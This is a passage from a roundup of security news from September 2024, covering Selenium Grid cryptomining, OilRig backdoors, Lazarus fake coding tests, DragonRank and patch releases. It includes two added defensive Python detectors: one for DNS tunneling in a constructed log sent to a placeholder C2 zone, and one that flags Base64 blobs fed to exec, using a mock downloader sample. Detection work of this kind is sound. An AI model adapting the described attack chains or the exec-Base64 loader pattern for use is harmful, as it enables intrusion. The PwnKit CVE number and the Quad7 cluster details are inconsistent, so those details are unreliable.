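On the constructed listing the audit reports vo1d as a look-alike of vold, debuggerd_real as a displaced original, and wd and su as binaries not on the allowlist. Comparing file hashes against the vendor's build manifest would be the stronger check where that manifest is available; the name-based heuristics here catch the disguise technique the report describes even when it is not.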
"Unfortunately, it is not uncommon for budget device manufacturers to utilize older OS versions and pass them off as more up-to-date ones to make them more attractive," the company said.
Update
Google told The Hacker News that the infected TV models were not Play Protect certified Android devices and likely used source code from the Android Open Source Project code repository. The company’s entire statement is as follows -
“These off-brand devices discovered to be infected were not Play Protect certified Android devices. If a device isn't Play Protect certified, Google doesn’t have a record of security and compatibility test results. Play Protect certified Android devices undergo extensive testing to ensure quality and user safety. To help you confirm whether or not a device is built with Android TV OS and Play Protect certified, our Android TV website provides the most up-to-date list of partners. You can also take these steps to check if your device is Play Protect certified.”
Exposed Selenium Grid Servers Targeted for Crypto Mining and Proxyjacking
13.9.24 Cryptocurrency The Hacker News
Internet-exposed Selenium Grid instances are being targeted by bad actors for illicit cryptocurrency mining and proxyjacking campaigns.
"Selenium Grid is a server that facilitates running test cases in parallel across different browsers and versions," Cado Security researchers Tara Gould and Nate Bill said in an analysis published today.
"However, Selenium Grid's default configuration lacks authentication, making it vulnerable to exploitation by threat actors."
The abuse of publicly-accessible Selenium Grid instances for deploying crypto miners was previously highlighted by cloud security firm Wiz in late July 2024 as part of an activity cluster dubbed SeleniumGreed.
Cado, which observed two different campaigns against its honeypot server, said the threat actors are exploiting the lack of authentication protections to carry out a diverse set of malicious actions.
The first of them leverages the "goog:chromeOptions" dictionary to inject a Base64-encoded Python script that, in turn, retrieves a script named "y," which is the open-source GSocket reverse shell.
The reverse shell subsequently serves as a medium for introducing the next-stage payload, a bash script named "pl" that retrieves IPRoyal Pawns and EarnFM from a remote server via curl and wget commands.
"IPRoyal Pawns is a residential proxy service that allows users to sell their internet bandwidth in exchange for money," Cado said.
"The user's internet connection is shared with the IPRoyal network with the service using the bandwidth as a residential proxy, making it available for various purposes, including for malicious purposes."
EarnFM is also a proxyware solution that's advertised as a "ground-breaking" way to "generate passive income online by simply sharing your internet connection."
The second attack, like the proxyjacking campaign, follows the same route to deliver a bash script via a Python script that checks if it's running on a 64-bit machine and then proceeds to drop a Golang-based ELF binary.
The ELF file subsequently attempts to escalate to root by leveraging the PwnKit flaw (CVE-2021-4043) and drops an XMRig cryptocurrency miner called perfcc.
"As many organizations rely on Selenium Grid for web browser testing, this campaign further highlights how misconfigured instances can be abused by threat actors," the researchers said. "Users should ensure authentication is configured, as it is not enabled by default."
Iranian Cyber Group OilRig Targets Iraqi Government in Sophisticated Malware Attack
13.9.24 APT The Hacker News
Iraqi government networks have emerged as the target of an "elaborate" cyber attack campaign orchestrated by an Iran state-sponsored threat actor called OilRig.
The attacks singled out Iraqi organizations such as the Prime Minister's Office and the Ministry of Foreign Affairs, cybersecurity company Check Point said in a new analysis.
OilRig, also called APT34, Crambus, Cobalt Gypsy, GreenBug, Hazel Sandstorm (formerly EUROPIUM), and Helix Kitten, is an Iranian cyber group associated with the Iranian Ministry of Intelligence and Security (MOIS).
Active since at least 2014, the group has a track record of conducting phishing attacks in the Middle East to deliver a variety of custom backdoors such as Karkoff, Shark, Marlin, Saitama, MrPerfectionManager, PowerExchange, Solar, Mango, and Menorah for information theft.
The latest campaign is no exception in that it involves the use of a new set of malware families dubbed Veaty and Spearal, which come with capabilities to execute PowerShell commands and harvest files of interest.
"The toolset used in this targeted campaign employs unique command-and-control (C2) mechanisms, including a custom DNS tunneling protocol, and a tailor-made email based C2 channel," Check Point said.
"The C2 channel uses compromised email accounts within the targeted organization, indicating that the threat actor successfully infiltrated the victim's networks."
Some of the actions that the threat actor took in executing the attack, and following it, were consistent with tactics, techniques, and procedures (TTPs) that OilRig has employed when carrying out similar operations in the past.
This includes the use of email-based C2 channels, specifically leveraging previously compromised email mailboxes to issue commands and exfiltrate data. This modus operandi has been common to several backdoors such as Karkoff, MrPerfectionManager, and PowerExchange.
The attack chain is kicked off via deceptive files masquerading as benign documents ("Avamer.pdf.exe" or "IraqiDoc.docx.rar") that, when launched, pave the way for the deployment of Veaty and Spearal. The infection pathway is said to have likely involved an element of social engineering.
The files initiate the execution of intermediate PowerShell or Pyinstaller scripts that, in turn, drop the malware executables and their XML-based configuration files, which include information about the C2 server.
"The Spearal malware is a .NET backdoor that utilizes DNS tunneling for [C2] communication," Check Point said. "The data transferred between the malware and the C2 server is encoded in the subdomains of DNS queries using a custom Base32 scheme."
Spearal is designed to execute PowerShell commands, read file contents and send them in the form of Base32-encoded data, and retrieve data from the C2 server and write it to a file on the system.
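DNS tunneling of the kind described for Spearal has a recognizable shape in resolver logs: long labels drawn from a narrow encoding alphabet, many distinct subdomains under a single zone, and high character entropy in the subdomain part. The following detector is an added example for this page, not Check Point's code or a signature for Spearal; its log lines are constructed, the zone "c2-placeholder.invalid" is a placeholder, and because the report does not publish Spearal's custom Base32 variant the alphabet check assumes the standard RFC 4648 set (A-Z, 2-7).

```python
"""Score DNS queries for tunneling-style encoded subdomains.

Added example; the log lines are constructed and the zone
"c2-placeholder.invalid" is a placeholder, not an indicator from the Check
Point report. Because Spearal's custom Base32 variant is not described here,
the detector assumes the standard RFC 4648 alphabet (A-Z, 2-7).
"""
import math
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# A label made only of Base32 alphabet characters and long enough to carry data.
BASE32_LABEL = re.compile(r"^[A-Z2-7]{16,}$", re.IGNORECASE)

# Constructed resolver log: timestamp, client, record type, queried name.
SAMPLE_LOG = """
2024-09-10T10:00:01Z 10.0.0.5 A www.example.com
2024-09-10T10:00:02Z 10.0.0.5 A mail.example.com
2024-09-10T10:00:03Z 10.0.0.7 A KRSXG5BAMJQXGZJTGIQGK3TDN5SGKZBAMRQXIYI.ns1.c2-placeholder.invalid
2024-09-10T10:00:04Z 10.0.0.7 A ORSXG5BAONSWG33OMQQGC43TNFTW4ZLSEBSGC5DB.ns1.c2-placeholder.invalid
2024-09-10T10:00:05Z 10.0.0.7 A MFXG65DIMVZCA3DJNZSSA33GEB3GS3TLNFXGOIDEMF2GC.ns1.c2-placeholder.invalid
2024-09-10T10:00:06Z 10.0.0.9 A cdn.static.example.net
"""


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; encoded payloads score higher than words."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def split_name(qname: str, zone_labels: int = 2) -> Tuple[List[str], str]:
    """Split into (subdomain labels, zone); a fixed zone depth is a simplification."""
    labels = qname.rstrip(".").split(".")
    return labels[:-zone_labels], ".".join(labels[-zone_labels:])


def score_query(qname: str) -> Tuple[float, List[str]]:
    """Return a tunneling score and the reasons contributing to it."""
    sub, _zone = split_name(qname)
    score, reasons = 0.0, []
    encoded = [lbl for lbl in sub if BASE32_LABEL.match(lbl)]
    if encoded:
        score += 2.0 * len(encoded)
        reasons.append(f"{len(encoded)} base32-like label(s)")
    payload = "".join(sub)
    if len(payload) > 50:
        score += 1.0
        reasons.append(f"long subdomain payload ({len(payload)} chars)")
    if shannon_entropy(payload) > 3.5:
        score += 1.0
        reasons.append("high-entropy subdomain")
    return score, reasons


def parse_qnames(log_text: str) -> List[str]:
    """Pull the queried name (last field) out of each non-empty log line."""
    return [line.split()[-1] for line in log_text.splitlines() if line.strip()]


def detect(log_text: str, min_score: float = 2.0, unique_threshold: int = 3) -> Dict[str, List[str]]:
    """Flag individual suspicious queries and zones receiving many unique subdomains."""
    suspicious: List[str] = []
    per_zone: Dict[str, set] = defaultdict(set)
    for qname in parse_qnames(log_text):
        score, _ = score_query(qname)
        if score >= min_score:
            suspicious.append(qname)
        sub, zone = split_name(qname)
        per_zone[zone].add(".".join(sub))
    busy = sorted(z for z, subs in per_zone.items() if len(subs) >= unique_threshold)
    return {"suspicious_queries": suspicious, "busy_zones": busy}


if __name__ == "__main__":
    result = detect(SAMPLE_LOG)
    for q in result["suspicious_queries"]:
        print("suspicious:", q, score_query(q)[1])
    print("busy zones:", result["busy_zones"])
```

On the constructed log the three encoded queries are flagged individually and their shared zone is reported for receiving three distinct subdomains, while the ordinary www, mail and CDN lookups score zero. The per-zone count is the more robust of the two signals against an attacker who shortens labels or changes alphabets, since a tunnel still needs a fresh name for every message; thresholds and the fixed zone depth would be tuned against the organization's own traffic baseline.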
Also written in .NET, Veaty leverages emails for C2 communications with the end goal of downloading files and executing commands via specific mailboxes belonging to the gov-iq.net domain. The commands allow it to upload/download files and run PowerShell scripts.
Check Point said its analysis of the threat actor infrastructure led to the discovery of a different XML configuration file that's likely associated with a third SSH tunneling backdoor.
It further identified an HTTP-based backdoor, CacheHttp.dll, that targets Microsoft's Internet Information Services (IIS) servers and examines incoming web requests for "OnGlobalPreBeginRequest" events and executes commands when they occur.
"The execution process begins by checking if the Cookie header is present in incoming HTTP requests and reads until the ';' sign," Check Point said. "The main parameter is F=0/1 which indicates whether the backdoor initializes its command configuration (F=1) or runs the commands based on this configuration (F=0)."
The malicious IIS module, which represents an evolution of a malware classified as Group 2 by ESET in August 2021 and another APT34 IIS backdoor codenamed RGDoor, supports command execution and file read/write operations.
"This campaign against Iraqi government infrastructure highlights the sustained and focused efforts of Iranian threat actors operating in the region," the company said.
"The deployment of a custom DNS tunneling protocol and an email-based C2 channel leveraging compromised accounts highlights the deliberate effort by Iranian actors to develop and maintain specialized command-and-control mechanisms."
Ireland's Watchdog Launches Inquiry into Google's AI Data Practices in Europe
13.9.24 AI The Hacker News
The Irish Data Protection Commission (DPC) has announced that it has commenced a "Cross-Border statutory inquiry" into Google's foundational artificial intelligence (AI) model to determine whether the tech giant has adhered to data protection regulations in the region when processing the personal data of European users.
"The statutory inquiry concerns the question of whether Google has complied with any obligations that it may have had to undertake an assessment, pursuant to Article 35[2] of the General Data Protection Regulation (Data Protection Impact Assessment), prior to engaging in the processing of the personal data of E.U./E.E.A. data subjects associated with the development of its foundational AI model, Pathways Language Model 2 (PaLM 2)," the DPC said.
PaLM 2 is Google's state-of-the-art language model with improved multilingual, reasoning, and coding capabilities. It was unveiled by the company in May 2023.
With Google's European headquarters based in Dublin, the DPC acts as the primary regulator responsible for making sure the company abides by the bloc's stringent data privacy rulebook.
The DPC said an inquiry is crucial to ensure that individuals' fundamental rights and freedoms are safeguarded, especially since processing such data to develop AI systems can pose a "high risk."
The development comes weeks after social media platform X permanently agreed not to train its AI chatbot, Grok, using the personal data it collected from European users without obtaining prior consent. Back in August, the DPC said X consented to suspend its "processing of the personal data contained in the public posts of X's E.U./E.E.A. users which it processed between 7 May 2024 and 1 August 2024."
Meta, which recently admitted to scraping every Australian adult Facebook user's public data to train its Llama AI models without giving them an opt-out, has paused its plans to use content posted by European users following a request from the DPC over privacy concerns. It has also suspended the use of generative AI (GenAI) in Brazil after the country's data protection authority issued a preliminary ban objecting to its new privacy policy.
Last year, Italy's data privacy regulator also temporarily banned OpenAI's ChatGPT because of concerns that its practices are in violation of data protection laws in the region.
WordPress Mandates Two-Factor Authentication for Plugin and Theme Developers
13.9.24 Safety The Hacker News
WordPress.org has announced a new account security measure that will require accounts with capabilities to update plugins and themes to activate two-factor authentication (2FA) mandatorily.
The enforcement is expected to come into effect starting October 1, 2024.
"Accounts with commit access can push updates and changes to plugins and themes used by millions of WordPress sites worldwide," the maintainers of the open-source, self-hosted version of the content management system (CMS) said.
"Securing these accounts is essential to preventing unauthorized access and maintaining the security and trust of the WordPress.org community."
Besides requiring mandatory 2FA, WordPress.org said it's introducing what's called SVN passwords, which refers to a dedicated password for committing changes.
This, it said, is an effort to introduce a new layer of security by separating users' code commit access from their WordPress.org account credentials.
"This password functions like an application or additional user account password," the team said. "It protects your main password from exposure and allows you to easily revoke SVN access without having to change your WordPress.org credentials."
WordPress.org also noted that technical limitations have prevented 2FA from being applied to existing code repositories, as a result of which it has opted for a "combination of account-level two-factor authentication, high-entropy SVN passwords, and other deploy-time security features (such as Release Confirmations)."
The measures are seen as a way to counter scenarios where a malicious actor could seize control of a publisher's account, thereby introducing malicious code into legitimate plugins and themes, resulting in large-scale supply chain attacks.
The disclosure comes as Sucuri warned of ongoing ClearFake campaigns targeting WordPress sites that aim to distribute an information stealer called RedLine by tricking site visitors into manually running PowerShell code in order to fix an issue with rendering the web page.
Threat actors have also been observed leveraging infected PrestaShop e-commerce sites to deploy a credit card skimmer to siphon financial information entered on checkout pages.
"Outdated software is a primary target for attackers who exploit vulnerabilities in old plugins and themes," security researcher Ben Martin said. "Weak admin passwords are a gateway for attackers."
Users are recommended to keep their plugins and themes up-to-date, deploy a web application firewall (WAF), periodically review administrator accounts, and monitor for unauthorized changes to website files.
Quad7 Botnet Expands to Target SOHO Routers and VPN Appliances
13.9.24 BotNet The Hacker News
The operators of the mysterious Quad7 botnet are actively evolving by compromising several brands of SOHO routers and VPN appliances by leveraging a combination of both known and unknown security flaws.
Targets include devices from TP-LINK, Zyxel, Asus, Axentra, D-Link, and NETGEAR, according to a new report by French cybersecurity company Sekoia.
"The Quad7 botnet operators appear to be evolving their toolset, introducing a new backdoor and exploring new protocols, with the aim of enhancing stealth and evading the tracking capabilities of their operational relay boxes (ORBs)," researchers Felix Aimé, Pierre-Antoine D., and Charles M. said.
Quad7, also called 7777, was first publicly documented by independent researcher Gi7w0rm in October 2023, highlighting the activity cluster's pattern of ensnaring TP-Link routers and Dahua digital video recorders (DVRs) into a botnet.
The botnet, which gets its name from the fact it opens TCP port 7777 on compromised devices, has been observed brute-forcing Microsoft 365 and Azure instances.
"The botnet also appears to infect other systems like MVPower, Zyxel NAS, and GitLab, although at a very low volume," VulnCheck's Jacob Baines noted earlier this January. "The botnet doesn't just start a service on port 7777. It also spins up a SOCKS5 server on port 11228."
Subsequent analyses by Sekoia and Team Cymru over the past few months have found that the botnet has not only compromised TP-Link routers in Bulgaria, Russia, the U.S., and Ukraine, but has since also expanded to target ASUS routers that have TCP ports 63256 and 63260 open.
The latest findings show that the botnet is comprised of three additional clusters -
xlogin (aka 7777 botnet) - A botnet composed of compromised TP-Link routers which have both TCP ports 7777 and 11288 opened
alogin (aka 63256 botnet) - A botnet composed of compromised ASUS routers which have both TCP ports 63256 and 63260 opened
rlogin - A botnet composed of compromised Ruckus Wireless devices which have TCP port 63210 opened
axlogin - A botnet capable of targeting Axentra NAS devices (not detected in the wild as yet)
zylogin - A botnet composed of compromised Zyxel VPN appliances that have TCP port 3256 opened
Sekoia told The Hacker News that the countries with the highest number of infections are Bulgaria (1,093), the U.S. (733), and Ukraine (697).
In a further sign of tactical evolution, the threat actors now utilize a new backdoor dubbed UPDTAE that uses an HTTP-based reverse shell to gain remote control over the infected devices and execute commands sent from a command-and-control (C2) server.
It's currently not clear what the exact purpose of the botnet is or who is behind it, but the company said the activity is likely the work of a Chinese state-sponsored threat actor.
"Regarding the 7777 [botnet], we only saw brute-force attempts against Microsoft 365 accounts," Aimé told the publication. "For the other botnets, we still don't know how they are used."
"However, after exchanges with other researchers and new findings, we are almost certain that the operators are more likely CN state-sponsored rather than simple cybercriminals doing [business email compromise]."
"We are seeing the threat actor attempting to be more stealthy by using new malwares on the compromised edge devices. The main aim behind that move is to prevent tracking of the affiliated botnets."
DragonRank Black Hat SEO Campaign Targeting IIS Servers Across Asia and Europe
13.9.24 APT The Hacker News
A "simplified Chinese-speaking actor" has been linked to a new campaign that has targeted multiple countries in Asia and Europe with the end goal of performing search engine optimization (SEO) rank manipulation.
The black hat SEO cluster has been codenamed DragonRank by Cisco Talos, with victimology footprint scattered across Thailand, India, Korea, Belgium, the Netherlands, and China.
"DragonRank exploits targets' web application services to deploy a web shell and utilizes it to collect system information and launch malware such as PlugX and BadIIS, running various credential-harvesting utilities," security researcher Joey Chen said.
The attacks have led to compromises of 35 Internet Information Services (IIS) servers with the end goal of deploying the BadIIS malware, which was first documented by ESET in August 2021.
It's specifically designed to facilitate proxyware and SEO fraud by turning the compromised IIS server into a relay point for malicious communications between its customers (i.e., other threat actors) and their victims.
On top of that, it can modify the content served to search engines to manipulate search engine algorithms and boost the ranking of other websites of interest to the attackers.
"One of the most surprising aspects of the investigation is how versatile IIS malware is, and the [detection of] SEO fraud criminal scheme, where malware is misused to manipulate search engine algorithms and help boost the reputation of third-party websites," security researcher Zuzana Hromcova told The Hacker News at the time.
The latest set of attacks highlighted by Talos spans a broad spectrum of industry verticals, including jewelry, media, research services, healthcare, video and television production, manufacturing, transportation, religious and spiritual organizations, IT services, international affairs, agriculture, sports, and feng shui.
The attack chains commence with taking advantage of known security flaws in web applications like phpMyAdmin and WordPress to drop the open-source ASPXspy web shell, which then acts as a conduit to introduce supplemental tools into the targets' environment.
The primary objective of the campaign is to compromise the IIS servers hosting corporate websites, abusing them to implant the BadIIS malware and effectively repurposing them as a launchpad for scam operations by utilizing keywords related to porn and sex.
Another significant aspect of the malware is its ability to masquerade as the Google search engine crawler in its User-Agent string when it relays the connection to the command-and-control (C2) server, thereby allowing it to bypass some website security measures.
"The threat actor engages in SEO manipulation by altering or exploiting search engine algorithms to improve a website's ranking in search results," Chen explained. "They conduct these attacks to drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings."
One important way DragonRank distinguishes itself from other black hat SEO cybercrime groups is in the manner it attempts to breach additional servers within the target's network and maintain control over them using PlugX, a backdoor widely shared by Chinese threat actors, and various credential-harvesting programs such as Mimikatz, PrintNotifyPotato, BadPotato, and GodPotato.
Although the PlugX malware used in the attacks relies on DLL side-loading techniques, the loader DLL responsible for launching the encrypted payload uses the Windows Structured Exception Handling (SEH) mechanism in an attempt to ensure that the legitimate file (i.e., the binary susceptible to DLL side-loading) can load the PlugX without tripping any alarms.
Evidence unearthed by Talos points to the threat actor maintaining a presence on Telegram under the handle "tttseo" and the QQ instant message application to facilitate illegal business transactions with paying clients.
"These adversaries also offer seemingly quality customer service, tailoring promotional plans to best fit their clients' needs," Chen added.
"Customers can submit the keywords and websites they wish to promote, and DragonRank develops a strategy suited to these specifications. The group also specializes in targeting promotions to specific countries and languages, ensuring a customized and comprehensive approach to online marketing."
Singapore Police Arrest Six Hackers Linked to Global Cybercrime Syndicate
11.9.24 Crime The Hacker News
The Singapore Police Force (SPF) has announced the arrest of five Chinese nationals and one Singaporean man for their alleged involvement in illicit cyber activities in the country.
The development comes after a group of about 160 law enforcement officials conducted a series of raids on September 9, 2024, simultaneously at several locations.
The six men, aged between 32 and 42, are suspected of being linked to a "global syndicate" that conducts malicious cyber activities. Pursuant to the operation, electronic devices and cash were seized.
Among those apprehended is a 42-year-old Chinese national from Bidadari Park Drive, who was found to be in possession of a laptop that contained credentials to access web servers used by known hacker groups. The identities of the threat actors were not disclosed.
In addition, five laptops, six mobile phones, cash totaling more than S$24,000 (USD$18,400), and cryptocurrency worth approximately USD$850,000 were confiscated from the individual.
Three other Chinese nationals, arrested from Mount Sinai Avenue, are said to have been in possession of laptops containing personal information related to foreign internet service providers, hacking tools, and "specialized software to control malware" such as PlugX, a remote access trojan widely used by Chinese state-sponsored groups.
The authorities also seized seven laptops, 11 mobile phones, and cash worth more than S$54,600 (USD$41,900) from the three men.
Another 38-year-old Chinese national was arrested from Cairnhill Road over suspicions of "offering to purchase personally identifiable information that was believed to have been obtained through illegal means."
The sixth person, a 34-year-old Singaporean national residing in Hougang Avenue, is believed to have assisted the others in their malicious activities.
The defendants have been charged with offenses under the Computer Misuse Act 1993 for gaining unauthorized access to computer material, retaining personal information without authorization, and retaining software that could be used to commit other malicious attacks.
The Singaporean national has also been charged with abetting the securing of unauthorized access to websites, an offense that's punishable with a fine of up to S$5,000 (USD$3,830), or a jail term of up to two years, or both, for a first-time offender.
Channel News Asia has reported that a sixth Chinese national was also subsequently arrested on Wednesday for instructing the Singapore man to subscribe to a Singtel broadband plan.
"This is a significant operation as the individuals are suspected to be carrying out global malicious cyber operations from Singapore," the SPF said. "We have zero tolerance of the use of Singapore to conduct criminal activities, including illegal cyber activities. We will deal severely with perpetrators."
Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware
11.9.24 APT The Hacker News
Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments.
"The new samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews," ReversingLabs researcher Karlo Zanki said.
The activity has been assessed to be part of an ongoing campaign dubbed VMConnect that first came to light in August 2023. There are indications that it is the handiwork of the North Korea-backed Lazarus Group.
The use of job interviews as an infection vector has been adopted widely by North Korean threat actors, either approaching unsuspecting developers on sites such as LinkedIn or tricking them into downloading rogue packages as part of a purported skills test.
These packages, for their part, have been published directly on public repositories like npm and PyPI, or hosted on GitHub repositories under their control.
ReversingLabs said it identified malicious code embedded within modified versions of legitimate PyPI libraries such as pyperclip and pyrebase.
"The malicious code is present in both the __init__.py file and its corresponding compiled Python file (PYC) inside the __pycache__ directory of respective modules," Zanki said.
It's implemented in the form of a Base64-encoded string that obscures a downloader function that establishes contact with a command-and-control (C2) server in order to execute commands received as a response.
In one instance of the coding assignment identified by the software supply chain firm, the threat actors sought to create a false sense of urgency by requiring job seekers to build a Python project shared in the form of a ZIP file within five minutes and find and fix a coding flaw in the next 15 minutes.
This makes it "more likely that he or she would execute the package without performing any type of security or even source code review first," Zanki said, adding "that ensures the malicious actors behind this campaign that the embedded malware would be executed on the developer's system."
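The three traits the report attributes to these packages (malicious code in __init__.py, a matching compiled file shipped inside __pycache__, and a Base64-encoded string that hides a downloader) are all visible without running anything. What follows is an added example, not ReversingLabs' tooling or code from the campaign: a static triage script a developer could run over a take-home assignment before executing it. It walks a package tree, flags .pyc files shipped under __pycache__, and parses each source file with the ast module to find long strict-Base64 string constants and dynamic-execution calls. The 80-character blob threshold, the DYNAMIC_CALLS set and the sample package named pyperclip_clone are my own constructed choices.

```python
"""Static triage of a Python package before it is executed.

Added example (not ReversingLabs' or the campaign's code). It walks a package
directory and flags the three traits the report describes: long Base64 string
constants, dynamic-execution calls that would turn such a string into code, and
compiled .pyc files shipped inside __pycache__ next to the source.
"""
import ast
import base64
import binascii
import os
import tempfile
import textwrap

MIN_BLOB_LEN = 80  # assumed threshold; ordinary code rarely embeds blobs this long
DYNAMIC_CALLS = {"exec", "eval", "compile", "__import__"}


def is_base64_blob(value: str) -> bool:
    """True if the string is long enough to hide code and decodes as strict Base64."""
    if len(value) < MIN_BLOB_LEN:
        return False
    try:
        base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def scan_source(path: str, source: str) -> list:
    """Parse one source file and return (path, lineno, kind) findings."""
    findings = []
    try:
        tree = ast.parse(source, filename=path)
    except SyntaxError as exc:
        return [(path, exc.lineno or 0, "unparseable")]
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if is_base64_blob(node.value):
                findings.append((path, node.lineno, "base64_blob"))
        elif isinstance(node, ast.Call):
            func = node.func
            name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
            if name in DYNAMIC_CALLS:
                findings.append((path, node.lineno, f"dynamic_call:{name}"))
    return findings


def scan_package(root: str) -> list:
    """Walk a package tree; flag shipped .pyc files and suspicious source constructs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in sorted(files):
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if fname.endswith(".pyc") and os.path.basename(dirpath) == "__pycache__":
                # A source package has no reason to ship precompiled bytecode.
                findings.append((rel, 0, "shipped_pyc"))
            elif fname.endswith(".py"):
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(rel, fh.read()))
    return sorted(findings)


# Constructed sample package: a benign-looking module that feeds a Base64 blob to
# exec, plus a shipped __pycache__ entry (placeholder bytes, not real bytecode).
SAMPLE_INIT = textwrap.dedent('''\
    import base64

    def copy(text):
        return text

    _p = "%s"
    exec(base64.b64decode(_p))
''') % base64.b64encode(b"print('stage-2 downloader would run here')" * 3).decode()


def build_sample_package() -> str:
    """Write the constructed package to a temp directory and return its root."""
    root = tempfile.mkdtemp(prefix="pkg_triage_")
    mod = os.path.join(root, "pyperclip_clone")
    os.makedirs(os.path.join(mod, "__pycache__"))
    with open(os.path.join(mod, "__init__.py"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_INIT)
    with open(os.path.join(mod, "__pycache__", "__init__.cpython-312.pyc"), "wb") as fh:
        fh.write(b"\x00" * 16)
    return root


if __name__ == "__main__":
    for finding in scan_package(build_sample_package()):
        print(finding)
```

Each finding is a lead rather than a verdict: a Base64 literal can be a legitimate embedded asset, and exec has honest uses. The combination the script surfaces here (a long blob, a dynamic call consuming it, and bytecode shipped alongside the source) is what should stop a candidate from running the project inside the interviewer's five-minute window. Because the page notes the malicious code also lives in the .pyc, a clean-looking __init__.py is not enough on its own: deleting any shipped __pycache__ directory before running the code forces the interpreter to recompile from the source you actually reviewed.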
Some of the aforementioned tests claimed to be a technical interview for financial institutions like Capital One and Rookery Capital Limited, underscoring how the threat actors are impersonating legitimate companies in the sector to pull off the operation.
It's currently not clear how widespread these campaigns are, although prospective targets are scouted and contacted using LinkedIn, as recently also highlighted by Google-owned Mandiant.
"After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user's macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons," the company said.
The development comes as cybersecurity company Genians revealed that the North Korean threat actor codenamed Konni is intensifying its attacks against Russia and South Korea by employing spear-phishing lures that lead to the deployment of AsyncRAT, with overlaps identified with a campaign codenamed CLOUD#REVERSER (aka puNK-002).
Some of these attacks also entail the propagation of a new malware called CURKON, a Windows shortcut (LNK) file that serves as a downloader for an AutoIt version of Lilith RAT. The activity has been linked to a sub-cluster tracked as puNK-003, per S2W.
Microsoft Issues Patches for 79 Flaws, Including 3 Actively Exploited Windows Flaws
11.9.24 Vulnerability The Hacker News
Microsoft on Tuesday disclosed that three new security flaws impacting the Windows platform have come under active exploitation as part of its Patch Tuesday update for September 2024.
The monthly security release addresses a total of 79 vulnerabilities, of which seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. This is aside from 26 flaws that the tech giant resolved in its Chromium-based Edge browser since last month's Patch Tuesday release.
The three vulnerabilities that have been weaponized in a malicious context are listed below, alongside a bug that Microsoft is treating as exploited -
CVE-2024-38014 (CVSS score: 7.8) - Windows Installer Elevation of Privilege Vulnerability
CVE-2024-38217 (CVSS score: 5.4) - Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability
CVE-2024-38226 (CVSS score: 7.3) - Microsoft Publisher Security Feature Bypass Vulnerability
CVE-2024-43491 (CVSS score: 9.8) - Microsoft Windows Update Remote Code Execution Vulnerability
"Exploitation of both CVE-2024-38226 and CVE-2024-38217 can lead to the bypass of important security features that block Microsoft Office macros from running," Satnam Narang, senior staff research engineer at Tenable, said in a statement.
"In both cases, the target needs to be convinced to open a specially crafted file from an attacker-controlled server. Where they differ is that an attacker would need to be authenticated to the system and have local access to it to exploit CVE-2024-38226."
As disclosed by Elastic Security Labs last month, CVE-2024-38217 – also referred to as LNK Stomping – is said to have been abused in the wild as far back as February 2018.
CVE-2024-43491, on the other hand, is notable for the fact that it's similar to the downgrade attack that cybersecurity company SafeBreach detailed early last month.
"Microsoft is aware of a vulnerability in Servicing Stack that has rolled back the fixes for some vulnerabilities affecting Optional Components on Windows 10, version 1507 (initial version released July 2015)," Redmond noted.
"This means that an attacker could exploit these previously mitigated vulnerabilities on Windows 10, version 1507 (Windows 10 Enterprise 2015 LTSB and Windows 10 IoT Enterprise 2015 LTSB) systems that have installed the Windows security update released on March 12, 2024 — KB5035858 (OS Build 10240.20526) or other updates released until August 2024."
The Windows maker further said it can be resolved by installing the September 2024 Servicing stack update (SSU KB5043936) and the September 2024 Windows security update (KB5043083), in that order.
It's also worth pointing out that Microsoft's "Exploitation Detected" assessment for CVE-2024-43491 stems from the rollback of fixes that addressed vulnerabilities impacting some Optional Components for Windows 10 (version 1507) that have been previously exploited.
"No exploitation of CVE-2024-43491 itself has been detected," the company said. "In addition, the Windows product team at Microsoft discovered this issue, and we have seen no evidence that it is publicly known."
Ivanti Releases Urgent Security Updates for Endpoint Manager Vulnerabilities
11.9.24 Vulnerability The Hacker News
Ivanti has released software updates to address multiple security flaws impacting Endpoint Manager (EPM), including 10 critical vulnerabilities that could result in remote code execution.
A brief description of the issues is as follows -
CVE-2024-29847 (CVSS score: 10.0) - A deserialization of untrusted data vulnerability that allows a remote unauthenticated attacker to achieve code execution.
CVE-2024-32840, CVE-2024-32842, CVE-2024-32843, CVE-2024-32845, CVE-2024-32846, CVE-2024-32848, CVE-2024-34779, CVE-2024-34783, and CVE-2024-34785 (CVSS scores: 9.1) - Multiple unspecified SQL injection vulnerabilities that allow a remote authenticated attacker with admin privileges to achieve remote code execution
The flaws impact EPM versions 2024 and 2022 SU5 and earlier, with fixes made available in versions 2024 SU1 and 2022 SU6, respectively.
Ivanti said it has found no evidence of the flaws being exploited in the wild as a zero-day, but it's essential that users update to the latest version to safeguard against potential threats.
Also addressed as part of the September update are seven high-severity shortcomings in Ivanti Workspace Control (IWC) and Ivanti Cloud Service Appliance (CSA).
The company said it has ramped up its internal scanning, manual exploitation and testing capabilities, and that it made improvements to its responsible disclosure process to swiftly discover and address potential issues.
"This has caused a spike in discovery and disclosure," the company noted.
The development comes in the aftermath of extensive in-the-wild exploitation of several zero-days in Ivanti appliances, including by China-nexus cyber espionage groups to breach networks of interest.
It also comes as Zyxel shipped fixes for a critical operating system (OS) command injection vulnerability (CVE-2024-6342, CVSS score: 9.8) in two of its network-attached storage (NAS) devices.
